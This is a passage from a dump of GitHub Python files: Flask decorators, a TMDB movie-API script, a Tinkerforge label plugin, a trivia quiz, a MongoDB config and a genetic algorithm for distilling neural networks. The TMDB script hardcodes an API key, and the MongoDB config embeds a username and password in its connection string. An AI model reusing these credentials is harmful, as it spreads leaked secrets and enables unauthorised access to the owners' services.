Approve()\n","repo_name":"africacodeacademy/fidelis-contracts-pyteal","sub_path":"contracts/loans/loan1.py","file_name":"loan1.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2554882497","text":"from functools import wraps\n\nfrom flask import jsonify, request, session, g\nfrom marshmallow import Schema,fields\nfrom peo.models.account import Account\nfrom werkzeug.wrappers import Response\n\n\ndef get_error_resp(exc_dict):\n return jsonify(exc_dict), exc_dict[\"status\"]\n\n\ndef process_request(f, *args, input_schema=None, output_schema=None, **kwargs):\n if input_schema:\n failure = {\n \"message\": \"Bad request\",\n \"status\": 400,\n }\n error = False\n content = request.get_json(silent=False, force=True)\n req, errors = input_schema.load(content)\n if req is None or errors:\n failure[\"errors\"] = errors\n return get_error_resp(failure)\n resp = f(req, *args, **kwargs)\n else:\n resp = f(*args, **kwargs)\n if isinstance(resp, Response):\n return resp\n body, status = resp\n if output_schema:\n body, errors = output_schema.dump(body)\n if errors:\n return get_error_resp({\n \"message\": \"Marshal error\",\n \"status\": 500,\n \"errors\": errors\n })\n\n return jsonify(body), status\n\n\ndef validate(input_schema=None, output_schema=None):\n def decor(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n return process_request(\n f, *args, input_schema=input_schema, output_schema=output_schema, **kwargs)\n return wrap\n return decor\n\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'uid' in session:\n return f(*args, **kwargs)\n raise Account.Unauthorized\n return wrap\n\n\ndef with_common_errors(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Account.Unauthorized:\n return get_error_resp({\n \"message\": \"Unauthorized\",\n \"status\": 401\n })\n return wrap\n","repo_name":"ostapsteam/peo","sub_path":"peo/blueprints/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1930235085","text":"import requests\n\ndef test():\n\treq = requests.get(\"https://api.themoviedb.org/3/movie/76341?api_key=fb3d514ef28708534a2c617322cacaf1&language=en\")\n\tprint(req.text)\n\ndef SearchMovie(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/movie?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()\n\tfor item in results[\"results\"]:\n\t\tprint(item[\"original_title\"],item[\"release_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"])\n\t# print(req.text)\n\ndef SearchTV(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/tv?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()\n\t# print(results)\n\tfor item in results[\"results\"]:\n\t\tprint(item[\"original_name\"],item[\"first_air_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"],item[\"origin_country\"])\n\ndef SearchMulti(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/multi?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()\n\t# print(results)\n\tfor item in results[\"results\"]:\n\t\tprint(item)\n\ndef GetTrending(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/trending/all/week?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\tresults = req.json()\n\t# print(results)\n\tfor item in results[\"results\"]:\n\t\t# print(item)\n\t\tif query != \"\" and query not in genresInverse:\n\t\t\tprint(\"Not a valid genre!\")\n\t\t\tbreak\n\t\tif query != \"\" and genresInverse.get(query,\"\") not in item[\"genre_ids\"]:\n\t\t\tcontinue\n\t\tif (item[\"media_type\"] == \"movie\"):\n\t\t\tprint(item[\"title\"],item[\"release_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"],item[\"media_type\"])\n\t\t\t# for genre in item[\"genre_ids\"]:\n\t\t\t# \tprint(genres[genre])\n\t\telse:\n\t\t\tprint(item[\"name\"],item[\"first_air_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"],item[\"media_type\"])\n\ndef GetGenres():\n\treq = requests.get(\"https://api.themoviedb.org/3/genre/movie/list?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\t# print(req.text)\n\tgenres_list = req.json()[\"genres\"]\n\tfor genre in genres_list:\n\t\tgenres[genre[\"id\"]] = genre[\"name\"].lower()\n\t\tgenresInverse[genre[\"name\"].lower()] = genre[\"id\"]\n\tprint(genres)\n\ndef GetWatchProvidersRegion():\n\treq = requests.get(\"https://api.themoviedb.org/3/watch/providers/regions?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\tprint(req.text)\n\ndef GetWatchProvidersMovie():\n\treq = requests.get(\"https://api.themoviedb.org/3/watch/providers/movie?api_key=fb3d514ef28708534a2c617322cacaf1&watch_region=CZ\")\n\tprint(req.text)\n\ndef GetWatchProvidersTV():\n\treq = requests.get(\"https://api.themoviedb.org/3/watch/providers/tv?api_key=fb3d514ef28708534a2c617322cacaf1&wath_region=CZ\")\n\tprint(req.text)\n\ndef DiscoverMovie():\n\treq = requests.get(\"https://api.themoviedb.org/3/discover/movie?api_key=fb3d514ef28708534a2c617322cacaf1&sort_by=popularity.desc\")\n\tresults = req.json()\n\tprint(results)\n\ndef GetRecommendations(query):\n\treq = requests.get(\"https://api.themoviedb.org/3/search/movie?api_key=fb3d514ef28708534a2c617322cacaf1&query=\" + query)\n\tresults = req.json()[\"results\"]\n\tmovie_id = results[0][\"id\"]\n\treq = requests.get(\"https://api.themoviedb.org/3/movie/\" + str(movie_id) +\"/recommendations?api_key=fb3d514ef28708534a2c617322cacaf1\")\n\tresults = req.json()[\"results\"]\n\t# print(results)\n\tfor item in results:\n\t\tprint(item[\"original_title\"],item[\"release_date\"].split(\"-\")[0],item[\"vote_average\"],item[\"popularity\"])\n\ngenres = {}\ngenresInverse = {}\n\nif __name__ == \"__main__\":\n\t# SearchMovie(input(\"Search for: \"))\n\t# SearchTV(input(\"Search for: \"))\n\t# SearchMulti(input(\"Search for: \"))\n\tGetGenres()\n\t# GetWatchProvidersRegion()\n\t# GetWatchProvidersMovie()\n\t# GetWatchProvidersTV()\n\t# GetTrending(input(\"Search for: \").lower())\n\t# DiscoverMovie()\n\tGetRecommendations(input(\"Search for: \"))\n\tinput()\n\n\n# Add discover movies\n# Add Movie Recommendations","repo_name":"fajtak/fun-tmbdAPI","sub_path":"tmbd.py","file_name":"tmbd.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39475487583","text":"x=int(input(\"Ingrese un numero entero\"))\r\nif x <0:\r\n x=0\r\n print('Negativo cambiado a cero')\r\nelif x ==0:\r\n print('Cero')\r\nelif x ==1:\r\n print('Uno')\r\nelse:\r\n print('Ninguna opcion')\r\n \r\n","repo_name":"asolisn/-ejercicios-de-python","sub_path":"ejercicios de python/ejercicio 6.py","file_name":"ejercicio 6.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74169359845","text":"import json\nimport requests\nimport os\n\ndef set_google_search_request_parameters(search_query):\n \"\"\"To Set up the request parameters for GET Query\"\"\"\n params = {}\n params['key'] = os.environ.get('discordapp_google_key')\n params['cx'] = os.environ.get('discordapp_google_cx')\n params['q'] = search_query\n return params\n\ndef find_google_results(search_query):\n \"\"\" To find the google results for a particular string and format the results\"\"\"\n URL = 'https://www.googleapis.com/customsearch/v1'\n params = set_google_search_request_parameters(search_query)\n result_data = requests.get(URL,params = params).content\n result_data_dict = json.loads(result_data)\n formatted_data = \"Here the following search results from GOOGLE! \\n\\n\"\n for item in result_data_dict['items'][:5]:\n formatted_data += f\"{item['title']} \\nURL : {item['link']} \\n\\n\"\n return formatted_data\n","repo_name":"gauravarora011/discord_bot","sub_path":"search_results.py","file_name":"search_results.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41312493957","text":"from PyQt5 import Qt, QtGui, QtCore\nfrom PyQt5.QtWidgets import QMessageBox\n\nfrom ..util import LabelInfo\nfrom ..plugin_base import PluginBase\nfrom ..tinkerforge.bricklet_distance_ir_v2 import BrickletDistanceIRV2\nfrom ..tinkerforge.bricklet_e_paper_296x128 import BrickletEPaper296x128\n\nimport traceback\n\nclass Plugin(PluginBase):\n TODO_TEXT = u\"\"\"\\\n1. Verbinde fertiges Bricklet mit Master Brick 3.0\n2. Etikett wird automatisch gedruckt\n\"\"\"\n\n def start(self):\n self.mw.button_flash.setEnabled(False)\n self.mw.check_print_label.show()\n self.mw.button_continue.hide()\n PluginBase.start(self)\n self.show_device_information(None, clear_value=True)\n\n def show_device_information(self, device_information, clear_value=False):\n if device_information != None:\n self.mw.set_tool_status_okay(\"Plugin gefunden\")\n\n if device_information.uid in ['1', '7xwQ9g']:\n self.mw.set_uid_status_error(\"Aktuelle UID \" + device_information.uid + \" ist ungültig\")\n else:\n self.mw.set_uid_status_okay(\"Aktuelle UID lautet \" + device_information.uid)\n\n self.mw.set_flash_status_okay(\"Aktuelle Firmware Version lautet \" + '.'.join([str(fw) for fw in device_information.firmware_version]))\n else:\n self.mw.set_tool_status_normal(\"Kein Plugin gefunden\")\n self.mw.set_uid_status_normal('-')\n self.mw.set_flash_status_normal('-')\n\n if clear_value:\n self.mw.set_value_normal('-')\n\n def handles_device_identifier(self, device_identifier):\n return str(device_identifier).startswith('2')\n\n def new_enum(self, device_information):\n self.show_device_information(device_information)\n\n if self.mw.check_print_label.isChecked():\n sku = device_information.device_identifier\n\n if sku == BrickletDistanceIRV2.DEVICE_IDENTIFIER:\n sensor_type = BrickletDistanceIRV2(device_information.uid, self.get_ipcon()).get_sensor_type()\n\n if sensor_type == 0:\n sku = 2125 # 4-30cm\n elif sensor_type == 1:\n sku = 2142 # 10-80cm\n elif sensor_type == 2:\n sku = 2143 # 20-150cm\n else:\n QMessageBox.critical(self.mw, 'Distance IR Bricklet 2.0', 'Unbekannter Sharp Distanz-Sensor: {0}'.format(sensor_type))\n return\n\n elif sku == BrickletEPaper296x128.DEVICE_IDENTIFIER:\n color = BrickletEPaper296x128(device_information.uid, self.get_ipcon()).get_display_type()\n\n if color == 0:\n sku = 2146 # red\n elif color == 1:\n sku = 2148 # gray\n else:\n QMessageBox.critical(self.mw, 'E-Paper 296x128 Bricklet', 'Unbekannte Farbe: {0}'.format(color))\n return\n\n self.mw.print_label(LabelInfo(sku, device_information.uid, device_information.firmware_version, device_information.hardware_version))\n","repo_name":"Tinkerforge/flash-test","sub_path":"src/flash-test/plugin_system/plugins/label_bricklet.py","file_name":"label_bricklet.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22763055757","text":"from colorama import Fore\nfrom QUESTION_FUNNY import FUNNY_QUESTIONS\nclass TRICKY_QUESTIONS(FUNNY_QUESTIONS):\n\n def Tricky_Q(self):\n\n cursor = self.Bridge.cursor()\n z = 'SELECT Question,Answer FROM dbo.Tricky_Questions'\n cursor.execute(z)\n score = 0\n for i in cursor:\n print(i[0])\n Answer = input(Fore.LIGHTMAGENTA_EX + \"enter the answer: \" + Fore.RESET)\n if Answer == i[1]:\n score += 1\n print(Fore.LIGHTGREEN_EX + \"Correct\" + Fore.RESET)\n else:\n print(Fore.RED + \"FAILED\" + Fore.RESET)\n print(\"Your final score is :\", score, \"/11\")\n print(Fore.RED + \"FOR TO START FIRST FILL YOUR PERSONAL DETAILS!\" + Fore.RESET)\n PersonId = int(input(Fore.LIGHTGREEN_EX + \"enter your id number: \" + Fore.RESET))\n LastName = input(Fore.LIGHTGREEN_EX + \"enter your lastname: \" + Fore.RESET)\n FirstName = input(Fore.LIGHTGREEN_EX + \"enter your firstname: \" + Fore.RESET)\n City = input(Fore.LIGHTGREEN_EX + \"enter your city: \" + Fore.RESET)\n Result = score\n cursor.execute(\n \"INSERT INTO SCHOOL.dbo.Examers(PersonId, LastName, FirstName, City, Result) VALUES (?, ?, ?, ?, ?)\",\n (PersonId, LastName, FirstName, City, Result))\n self.Bridge.commit()\n exit()\n","repo_name":"BenelMolla/TRIVIA_GAME","sub_path":"QUESTION_TRICKY.py","file_name":"QUESTION_TRICKY.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72851778085","text":"from flask_mongoengine import MongoEngine\n\nhost = 'mongodb://master:master228@ds125068.mlab.com:25068/heroku_wsvtmzmb?retryWrites=false'\napp_db_config = {\n 'db': 'heroku_wsvtmzmb',\n 'host': host\n }\n\n\ndef init_app(app):\n app.config['MONGODB_SETTINGS'] = app_db_config\n db = MongoEngine(app)\n\n","repo_name":"Frozen-people-club/puton-pompom","sub_path":"flask_backend/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24889390471","text":"#\n# This package implements a genetic algorithm for selection hyper-heuristics.\n# Nelishia Pillay\n# 27 August 2016\n# \n\n# Import statements\nfrom random import Random\nfrom typing import List\n\n#\n# This class implements a genetic algorithm selection hyper-heuristic\n# hyper-heuristic for selecting low-level constructive or perturbative\n# heuristics for a problem domain.\n#\nfrom GeneticAlgorithm.Solution import Solution\nfrom GeneticAlgorithm.Problem import Problem\n\nimport torch\nfrom NeuralNetwork.DeviceLoader import get_device, to_device, ToDeviceLoader\nfrom NeuralNetwork.Augmentation import trainingAugmentation, testingAugmentation\nfrom torch.utils.data.dataloader import DataLoader\nfrom torchvision.datasets import CIFAR100\n\nfrom os import path\n\nfrom NeuralNetwork.Helper import weights_init, getFeatureMaps, getModelWeights\nfrom NeuralNetwork.Train import train_student, train_model_distill_only\nfrom NeuralNetwork.ResNet import ResNet\nfrom NeuralNetwork.ResidualBlock import ResidualBlock\nfrom NeuralNetwork.Train import train_model, evaluate, train_model_with_distillation\nfrom NeuralNetwork.Print import plot_acc, plot_loss, printFeatureMaps, plot_ga_best, plot_layer_counter\n\n\nclass GeneticAlgorithm(object):\n # Data elements\n # \n # Stores the population size.\n # \n population_size: int\n\n # \n # Stores the tournament size.\n # \n tournament_size: int\n\n # \n # Stores the number of generations.\n # \n no_of_generations: int\n\n # \n # Stores the mutation application rate.\n # \n mutation_rate: float\n\n # \n # Stores the crossover application rate.\n # \n crossover_rate: float\n\n # \n # Stores the reproduction application rate.\n # \n reproduction_rate: float\n\n # \n # Stores the length of the string created by mutation to insert into the\n # selected parent.The length of the string is randomly selected between 1 and t\n # the this limit.\n # \n mutation_length: int\n\n # \n # Stores the maximum length for the chromosomes create in the initial\n # population.\n # \n initial_max_length: int\n\n # \n # Stores the maximum length or the chromosomes produced by the genetic\n # operators.\n # \n offspring_max_length: int\n\n # \n # Stores a Boolean value indicating whether duplicates should be allowed in the\n # initial population or not.The default value is false.\n # \n allow_duplicates: bool\n\n # \n # Stores a character for each problem specific heuristic.For example, \"lse\",\n # in which case there are three problem specific heuristics,represented by\n # \"l\", \"s\" and \"e\" respectively.\n # \n heuristics: str\n\n # \n # This variable stores a problem domain instance.\n # \n problem: Problem\n\n # \n # Stores and instances of the random number generator to be used by the genetic\n # algorithm.\n # \n ranGen: Random\n\n # \n # Stores the population.Each element is an instance of type InitialSolution.This\n # instance stores the heuristic combination, fitness and initial solution.\n # \n population: List[Solution]\n\n # \n # Is a flag used to determine whether output for each generation must be\n # printed to the screen or not.If it is set to true output is\n # printed.If it is set to false output is not printed.The default is\n # true.\n # \n print_: bool\n\n #\n # This is the constructor for the class.\n #\n # @param seed The seed for the random number generator.\n # @param heuristics A string of characters representing each of the low-level\n # heuristics for the problem domain.\n # \n def __init__(self, seed=123, heuristics='', ran_gen=None):\n if heuristics == '':\n raise ValueError('Heuristics cannot be empty')\n self.heuristics = heuristics\n # Initializes the random number generator.\n if seed == 123 and ran_gen is not None:\n self.ranGen = ran_gen\n else:\n self.ranGen = Random(seed)\n # Set the flag for printing output for each generation to true.\n self.print_ = True\n self.population_size = 0\n self.allow_duplicates = False\n\n # Methods for setting parameter values for the genetic algorithm\n #\n # Reads the parameters from a file and stores them as data element.\n #\n # @param parameterFile The name of the file the parameter values are stored\n # in.\n # \n def set_parameters(self, parameter_file):\n try:\n # Initialise input stream to read from a file\n with open(parameter_file, 'r') as f:\n self.population_size = int(f.readline())\n self.tournament_size = int(f.readline())\n self.no_of_generations = int(f.readline())\n self.mutation_rate = float(f.readline())\n self.crossover_rate = float(f.readline())\n self.initial_max_length = int(f.readline())\n self.offspring_max_length = int(f.readline())\n self.mutation_length = int(f.readline())\n\n print(\"Population size: \" + str(self.population_size))\n print(\"Tournament size: \" + str(self.tournament_size))\n print(\"Number of generations: \" + str(self.no_of_generations))\n print(\"Mutation rate: \" + str(self.mutation_rate))\n print(\"Crossover rate: \" + str(self.crossover_rate))\n print(\"Initial max length: \" + str(self.initial_max_length))\n print(\"Offspring max length: \" + str(self.offspring_max_length))\n print(\"Mutation length: \" + str(self.mutation_length))\n\n except IOError as ioe:\n print(\"The file \" + parameter_file + \" cannot be found. \" + \"Please check the details provided.\", ioe)\n\n #\n # Sets the number of generations size.\n #\n # @param noOfGenerations Parameter value for the number of generations.\n # \n def set_no_of_generations(self, no_of_generations):\n self.no_of_generations = no_of_generations\n\n #\n # @return The population size.\n # \n def get_population_size(self):\n return self.population_size\n\n #\n # Sets the population size.\n #\n # @param populationSize Parameter value for the population size.\n # \n def set_population_size(self, population_size):\n self.population_size = population_size\n\n #\n # @return The tournament size.\n # \n def get_tournament_size(self):\n return self.tournament_size\n\n #\n # Sets the tournament size.\n #\n # @param tournamentSize Parameter value for the tournament size.\n # \n def set_tournament_size(self, tournament_size):\n self.tournament_size = tournament_size\n\n #\n # @return Returns the number of generations.\n # \n def get_no_of_generations(self):\n return self.no_of_generations\n\n #\n # @return Returns the mutation rate.\n # \n def get_mutation_rate(self):\n return self.mutation_rate\n\n #\n # Sets the mutation rate.\n #\n # @param mutationRate Parameter value for the mutation rate. The value must be\n # a fraction, e.g. 0.5.\n # \n def set_mutation_rate(self, mutation_rate):\n self.mutation_rate = mutation_rate\n\n #\n # @return Returns the crossover rate.\n # \n def get_crossover_rate(self):\n return self.crossover_rate\n\n #\n # Sets the crossover rate.\n #\n # @param crossoverRate Parameter value for the crossover rate. The value must\n # be a fraction, e.g. 0.5.\n # \n def set_crossover_rate(self, crossover_rate):\n self.crossover_rate = crossover_rate\n\n #\n # @return Returns the reproduction rate.\n # \n def get_reproduction_rate(self):\n return self.reproduction_rate\n\n #\n # @return Returns the initial maximum length permitted for heuristic\n # combinations created in the initial population.\n # \n def get_initial_max_length(self):\n return self.initial_max_length\n\n #\n # Sets the maximum length of chromosome in the initial population.\n #\n # @param initialMaxLength Parameter value specifying the maximum length\n # permitted for heuristic combinations created in the initial population.\n # \n def set_initial_max_length(self, initial_max_length):\n self.initial_max_length = initial_max_length\n\n #\n # @return Returns the maximum offspring length.\n # \n def get_offspring_max_length(self):\n return self.offspring_max_length\n\n #\n # Sets the maximum length of the offspring produced by the genetic operators.If\n # the offspring size exceeds this length the substring equal to this value is\n # returned.\n #\n # @param offspringMaxLength Parameter value specifying the maximum length\n # permitted for offspring created by the mutation and crossover operators.\n # \n def set_offspring_max_length(self, offspring_max_length):\n self.offspring_max_length = offspring_max_length\n\n #\n # @return Returns the mutation length.\n # \n def get_mutation_length(self):\n return self.mutation_length\n\n #\n # Sets the maximum permitted length for the new substring created by mutation\n # to be inserted at a randomly selected point in a copy of the parent.The\n # length of the substring to be inserted is randomly selected to be between 1\n # and the this limit.\n #\n # @param mutationLength Parameter value specifying the mutation length.\n # \n def set_mutation_length(self, mutation_length):\n self.mutation_length = mutation_length\n\n #\n # @return Returns the value of the Boolean flag that is used to specify if\n # duplicates are allowed or not.\n # \n def get_allow_duplicates(self):\n return self.allow_duplicates\n\n #\n # This method sets the Boolean flag indicating whether duplicates are allowed\n # in the initial population of not.\n #\n # @param allowDuplicates A value of true or false which indicates whether\n # duplicates are allowed in the initial population or not.\n # \n def set_allow_duplicates(self, allow_duplicates):\n self.allow_duplicates = allow_duplicates\n\n #\n # @return Returns the value of the flag print used to determine whether to\n # print output to the screen.\n # \n def get_print(self):\n return self.print_\n\n #\n # Sets the flag for printing output for each generation to the screen.If it is\n # set to true output is printed.If it is set to false output\n # is not printed.The default is true.The output printed to the screen\n # is the best heuristic combination for each generation and its fitness as well\n # as the best fitness obtained thus far in the run.\n #\n # @param print A value of false or true indicating whether output for each\n # generation must be printed to the screen or not.\n # \n def set_print(self, print_):\n self.print_ = print_\n\n # Methods for setting problem specific information\n #\n # This method sets the string of characters, each representing a low-level\n # heuristic for the problem domain.\n #\n # @param heuristics The string of characters representing the low-level\n # heuristics.\n # \n def set_heuristics(self, heuristics):\n self.heuristics = heuristics\n\n #\n # This method sets the string of characters, each representing a low-level\n # heuristic for the problem domain.\n #\n # @param problem Is an instance of ProblemDomain which defines the\n # problem domain.\n # \n def set_problem(self, problem):\n self.problem = problem\n\n # Methods for creating the initial population\n def exists(self, heuristic_combination, pos):\n # Checks whether the Comb already exists in the population.\n count = 0\n while count < pos:\n if heuristic_combination == self.population[count].get_heuristic_combination():\n return True\n count += 1\n return False\n\n def create_heuristic_combination(self):\n heuristic_combination = ''\n length = self.ranGen.randrange(self.initial_max_length) + 1\n count = 1\n while count <= length:\n heuristic_combination += self.ranGen.choice(self.heuristics)\n count += 1\n return heuristic_combination\n\n def create_population(self, trainingItems) -> Solution:\n best = None\n self.population = []\n count = 0\n while count < self.population_size:\n if not self.allow_duplicates and self.population_size <= len(self.heuristics):\n while True:\n ind = self.create_heuristic_combination()\n if not self.exists(ind, count):\n break\n else:\n ind = self.create_heuristic_combination()\n self.population.append(self.evaluate(ind, trainingItems))\n self.population[count].set_heuristic_combination(ind)\n if count == 0:\n best = self.population[count]\n elif self.population[count].fitter(best) == 1:\n best = self.population[count]\n count += 1\n return best\n\n def display_population(self):\n print(\"Population\")\n for element in self.population:\n print(element.get_heuristic_combination(), element.get_fitness())\n\n def evaluate(self, ind, trainingItems) -> Solution:\n return self.problem.evaluate(ind, trainingItems)\n\n def selection(self) -> Solution:\n winner = self.ranGen.choice(self.population)\n count = 1\n while count < self.tournament_size:\n current = self.ranGen.choice(self.population)\n if current.fitter(winner) == 1:\n winner = current\n count += 1\n if self.print_:\n print('winner', winner)\n return winner\n\n def crossover(self, parent1: Solution, parent2: Solution, trainingItems) -> Solution:\n p1 = parent1.get_heuristic_combination()\n p2 = parent2.get_heuristic_combination()\n point1 = self.ranGen.randrange(len(p1))\n point2 = self.ranGen.randrange(len(p2))\n frag11 = p1[:point1]\n frag12 = p1[point1:]\n frag21 = p2[:point2]\n frag22 = p2[point2:]\n os1 = str(frag11 + frag22)\n os2 = str(frag21 + frag12)\n if self.offspring_max_length > 0 and self.offspring_max_length < len(os1):\n os1 = os1[:self.offspring_max_length]\n if self.offspring_max_length > 0 and self.offspring_max_length < len(os2):\n os2 = os2[:self.offspring_max_length]\n offspring1 = self.evaluate(os1, trainingItems)\n offspring1.set_heuristic_combination(os1)\n offspring2 = self.evaluate(os2, trainingItems)\n offspring2.set_heuristic_combination(os2)\n if offspring1.fitter(offspring2) == 1:\n return offspring1\n else:\n return offspring2\n\n def create_string(self, limit):\n str_ = ''\n count = 0\n while count < limit:\n str_ += self.ranGen.choice(self.heuristics)\n count += 1\n return str_\n\n def mutation(self, parent: Solution, trainingItems):\n com = parent.get_heuristic_combination()\n if self.print_:\n print('com', com)\n mutation_point = self.ranGen.randrange(len(com))\n mutation_length = self.ranGen.randrange(self.mutation_length) + 1\n hh = self.create_string(mutation_length)\n begin = com[: mutation_point]\n end = com[mutation_point + 1:]\n tem = begin + hh + end\n if self.offspring_max_length > 0 and self.offspring_max_length < len(tem):\n tem = tem[:self.offspring_max_length]\n offspring = self.evaluate(tem, trainingItems)\n offspring.set_heuristic_combination(tem)\n return offspring\n\n def regenerate(self, best_individual, trainingItems) -> Solution:\n number_of_mutations = int((self.mutation_rate * self.population_size))\n number_of_crossovers = int((self.crossover_rate * self.population_size))\n self.reproduction_rate = 0\n if (self.mutation_rate + self.crossover_rate) < 1:\n self.reproduction_rate = 1 - (self.mutation_rate + self.crossover_rate)\n number_of_reproductions = int((self.reproduction_rate * self.population_size))\n if not number_of_mutations + number_of_crossovers + number_of_reproductions == len(self.population):\n if not number_of_crossovers == 0:\n number_of_crossovers += len(self.population) - (\n number_of_mutations + number_of_crossovers + number_of_reproductions)\n elif not number_of_mutations == 0:\n number_of_mutations += len(self.population) - (\n number_of_mutations + number_of_crossovers + number_of_reproductions)\n best = self.population[0] # before: best = best_individual\n index = 0\n new_population: List[Solution] = []\n for i in range(number_of_reproductions):\n new_population.append(self.selection())\n if new_population[index].fitter(best) == 1:\n best = new_population[index]\n index += 1\n for i in range(number_of_mutations):\n new_population.append(self.mutation(self.selection(), trainingItems))\n if new_population[index].fitter(best) == 1:\n best = new_population[index]\n index += 1\n for i in range(number_of_crossovers):\n new_population.append(self.crossover(self.selection(), self.selection(), trainingItems))\n if new_population[index].fitter(best) == 1:\n best = new_population[index]\n index += 1\n self.population = new_population\n return best\n\n def evolve(self, trainingParameters):\n\n # create neural network.\n # Device configuration\n teacher_model_number = trainingParameters[0]\n student_model_number = trainingParameters[1]\n BATCH_SIZE = trainingParameters[2]\n\n device = get_device()\n\n # CIFAR-100 dataset\n train_dataset = CIFAR100(root='../../../data/', train=True, transform=trainingAugmentation(), download=True)\n test_dataset = CIFAR100(root='../../../data/', train=False, transform=testingAugmentation())\n\n # Data loader\n train_dl = DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, shuffle=True)\n test_dl = DataLoader(dataset=test_dataset, batch_size=BATCH_SIZE, shuffle=False)\n\n # RESNET 110\n teacher_chk_path = \"../../../NeuralNetwork/resnet110_0.7018.ckpt\"\n teacher_model = None\n if path.exists(teacher_chk_path):\n print(\"Loaded teacher model.\")\n teacher_model = ResNet(ResidualBlock, [teacher_model_number, teacher_model_number, teacher_model_number])\n teacher_model.load_state_dict(torch.load(teacher_chk_path))\n else:\n print(\"No teacher model found.\")\n exit()\n\n student_model = ResNet(ResidualBlock, [student_model_number, student_model_number, student_model_number])\n\n teacher_model = to_device(teacher_model, device)\n student_model = to_device(student_model, device)\n train_dl = ToDeviceLoader(train_dl, device)\n test_dl = ToDeviceLoader(test_dl, device)\n\n epochs = trainingParameters[3]\n optimizer = trainingParameters[4]\n max_lr = trainingParameters[5]\n distill_optimizer = trainingParameters[6]\n distill_lr = trainingParameters[7]\n grad_clip = trainingParameters[8]\n weight_decay = trainingParameters[9]\n scheduler = trainingParameters[10]\n kd_loss_type = trainingParameters[11]\n heuristicToLayerDict = trainingParameters[12]\n numOfBatchesToDistill = trainingParameters[13]\n initial_epochs = trainingParameters[14]\n total_epochs = trainingParameters[15]\n\n '''# Save old student weights to a file:\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet20_initial.ckpt\")\n\n # Train student for x epoch(s) and save its weights to a file:\n student_initialized_chk_path = \"../../../NeuralNetwork/resnet20_initialized_10_epochs.ckpt\"\n if not path.exists(student_initialized_chk_path):\n print(\"Training student model before distillation experimentation...\")\n student_model = train_student(student_model, 10, train_dl, test_dl, optimizer, max_lr, weight_decay,\n scheduler,\n grad_clip)\n\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet20_initialized_10_epochs.ckpt\")\n else:\n print(\"Partially trained student model found.\")'''\n\n '''# Save old student weights to a file:\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet56_initial.ckpt\")'''\n\n '''student_model.load_state_dict(torch.load(student_initialized_chk_path))\n for batch in train_dl:\n images, label = batch\n for image in images:\n print(getFeatureMaps(student_model, device, image))\n exit()'''\n\n # Train student for x epoch(s) and save its weights to a file:\n student_initialized_chk_path = \"../../../NeuralNetwork/resnet56_initialized_\" + str(initial_epochs) + \"_epochs.ckpt\"\n if not path.exists(student_initialized_chk_path):\n print(\"Training student model before distillation experimentation...\")\n student_model = train_student(student_model, initial_epochs, total_epochs, train_dl, test_dl, optimizer, max_lr, weight_decay,\n scheduler,\n teacher_model, grad_clip)\n\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet56_initialized_\" + str(initial_epochs) + \"_epochs.ckpt\")\n else:\n print(\"Partially trained student model found.\")\n\n layerCounter = []\n trainingItems = [heuristicToLayerDict, epochs, train_dl, test_dl, student_model,\n student_model_number,\n teacher_model, teacher_model_number, device, optimizer, max_lr, weight_decay, scheduler,\n kd_loss_type, distill_optimizer, distill_lr, grad_clip, initial_epochs, layerCounter]\n\n if self.print_:\n print(\"Generation 0\")\n best = self.create_population(trainingItems)\n if self.print_:\n print(\"Best Fitness:\", best.get_fitness())\n print(\"Heuristic Combination:\", best.get_heuristic_combination())\n print()\n count = 0\n bestArr = []\n while count < self.no_of_generations:\n if self.print_:\n print(\"Generation\", count + 1)\n ind = self.regenerate(best, trainingItems)\n bestArr.append(ind.get_fitness())\n if ind.fitter(best) == 1:\n best = ind\n if self.print_:\n print(\"Generation Best Fitness:\", ind.get_fitness())\n print(\"Generation Best Heuristic Combination: \" + ind.get_heuristic_combination())\n print(\"Overall Best Fitness:\", best.get_fitness())\n print(\"Overall Best Heuristic Combination: \" + best.get_heuristic_combination())\n print()\n count += 1\n\n print(\"Completed evolving heuristic combination.\")\n plot_ga_best(bestArr)\n print(\"Generation best graph created.\")\n plot_layer_counter(layerCounter)\n 